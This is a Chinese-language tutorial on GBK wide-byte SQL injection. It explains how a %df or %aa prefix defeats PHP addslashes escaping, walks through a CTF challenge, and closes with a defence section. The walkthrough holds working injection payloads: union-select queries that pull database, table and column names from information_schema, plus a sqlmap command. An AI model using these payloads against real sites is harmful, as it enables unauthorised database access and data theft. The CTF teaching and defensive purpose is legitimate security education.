0x01 前言
準備系統梳理和總結提高這一年所學的關於Web方面東西,如有問題歡迎指點。
在計算機中,字符的表示與存儲都離不開編碼。例如ASCII,utf-8,gbk2312等。通常字符的表示都只需1字節。但也有如gbk2312這種需要2字節來表示的編碼格式,這種我們稱之爲寬字節。
所謂寬字節注入,可能存在於以gbk編碼存儲數據的sql數據庫中。在實際站點中已經比較少見(常見於學校遠古破站),而且修復方案很簡單。在CTF中屬於入門的sql注入題目。
0x02 寬字節注入原理分析
0x01 認識addslashes
在基於php對sql注入的防禦裏,總會提到這個函數。
addslashes ( string $str ) : string
在php官方文檔中,對該函數的說明如下:
返回字符串,該字符串爲了數據庫查詢語句等的需要在某些字符前加上了反斜線。這些字符是單引號(')、雙引號(")、反斜線()與 NUL(NULL 字符)。
舉例:
<?php
$str = "Is your name O'reilly?";
// 輸出: Is your name O\'reilly?
echo addslashes($str);
?>
對於最簡單的字符型數字型注入,經改函數轉義的sql語句確實會“卡死“單引號。(構造攻擊的sql語句不會執行)
但對於該函數的繞過,其實並不困難,無非兩點:
1.在前面再加一個(或單數個),變成( '),可以導致被轉義,從而讓‘逃出限制。
2.把弄沒。**
在下面的例子中你可以體會到,若是該數據庫採用了寬字節的編碼,這個函數就變成了紙老虎。
0x02 寬字節注入原理
寬字節注入利用了mysql一個特性,即當mysql在使用GBK編碼的時候,會認爲兩個字符是一個漢字。(前一個ASCII碼要大於128,纔到漢字的範圍)
先了解一下這些字符的url編碼:
當輸入單引號,經addslashes轉義後,對應的url編碼是:
‘ --> \' --> %5C%27
當在前面引入一個ASCII大於128的字符(比如%df),url編碼變爲:
%df --> %df \ ' --> (%df%5C)%27
若使用gbk編碼的話,%df%5C會被當作一個漢字處理,從而使%27(單引號)逃出生天,成功繞過
我們用url編碼來研究一下:
當使用gbk編碼,可以看到一個漢字佔了2個字節。
來對\'編碼一下:
現在在前面加上%df,可以看到%df%5C被當成了漢字,單引號成功逃脫:
0x03 寬字節注入利用釋例
這裏以南郵ctf(CG CTF)一道Web題:SQL-GBK爲例。
輸入id=1',可以看到’被變成了\',是addslashes
函數轉義的結果。
用上文講到的方法,構造id=1%df',id=1%aa',成功報錯
下面可以就是常規的手工注入了,不太清楚的可以參考網上一些文章,如:https://blog.csdn.net/Litbai_zhang/article/details/83869918
首先構造order by語句嘗試獲得列數,注意最後要用閉合(註釋掉後面的語句,不讓其影響構造語句執行)
常見的閉合手段有:井號,--+等。
這裏用井號,用%23來表示,否則可能解析不了
?id=1%aa' order by 2 %23
3已經報錯了,可以知道列數(字段數)爲2.
繼續用union來判斷數據的顯示位置:
對於這一步有一篇文章寫的很好,推薦一下:https://blog.csdn.net/weixin_44840696/article/details/89166154
?id=999%aa' union select 1,2 %23
知道了回顯的位置是2.
下一步,把2改成database(),成功獲取庫名:sae-chinalover
?id=999%aa' union select 1,database() %23
繼續跟進,查表名。(不放鏈接了,不太清楚可以百度下mysql自身的系統庫結構與讀取信息的函數):
注意:因爲單引號會被轉義,所以直接令table_schema=庫名是行不通的。
?id=999%aa' union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'sae-chinalover' %23
可以把庫名代替爲database()。成功獲取表名。
?id=999%aa' union select 1,group_concat(table_name) from information_schema.tables where table_schema = database() %23
下一步爆字段,把四個表的字段依次爆一遍,在ctf4中發現有flag字段:
?id=999%aa' union select 1,group_concat(column_name) from information_schema.columns where table_name = 0x63746634 %23
查詢一下,成功獲取flag。
順便一題,這道題目也可以用sqlmap直接跑。把你構造的寬字符繞過語句扔上去就行了。以爆庫名爲例:
sqlmap -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%aa%27" --current-db
0x04 寬字節注入的防禦
對於寬字節注入,有一種最好的修補就是:
(1)使用mysql_set_charset(GBK)
指定字符集
(2)使用mysql_real_escape_string
進行轉義
mysql_real_escape_string
與addslashes
的不同之處在於其會考慮當前設置的字符集。不會出現把%aa%5c拼接爲一個寬字節的問題。
所以用mysql_set_charset
對當前字符集進行指定,然後轉義即可。